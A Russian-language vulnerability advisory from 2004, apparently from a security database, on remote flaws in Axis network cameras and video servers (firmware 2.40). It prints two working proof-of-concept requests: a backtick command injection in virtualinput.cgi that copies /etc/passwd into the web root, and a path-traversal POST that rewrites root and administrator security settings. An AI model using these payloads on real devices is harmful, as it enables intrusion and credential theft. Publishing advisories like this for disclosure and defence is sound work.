Несколько уязвимостей в Axis network cameras

Дата публикации:
26.08.2004
Всего просмотров:
979
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Axis Network Cameras Firmware Version 2.40; Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server

Описание: Несколько уязвимостей обнаружено в Axis network cameras. Удаленный пользователь может просматривать и редактировать файлы и получить административный доступ к целевой системе.

1.

/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/ httpd/html/passwd\x60 HTTP/1.1
2.
 
POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0\nContent-Length: 250
Pragma: no-cache

conf_Security_List=root%%3AADVO%%30t&checkAdmin=on&checkDial=on&ch eckView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables

Пример/Эксплоит: Еще примеры см. в источнике сообщения.

URL производителя: http://www.axis.com/products/video/camera/index.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [Full-Disclosure] [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers

или введите имя

CAPTCHA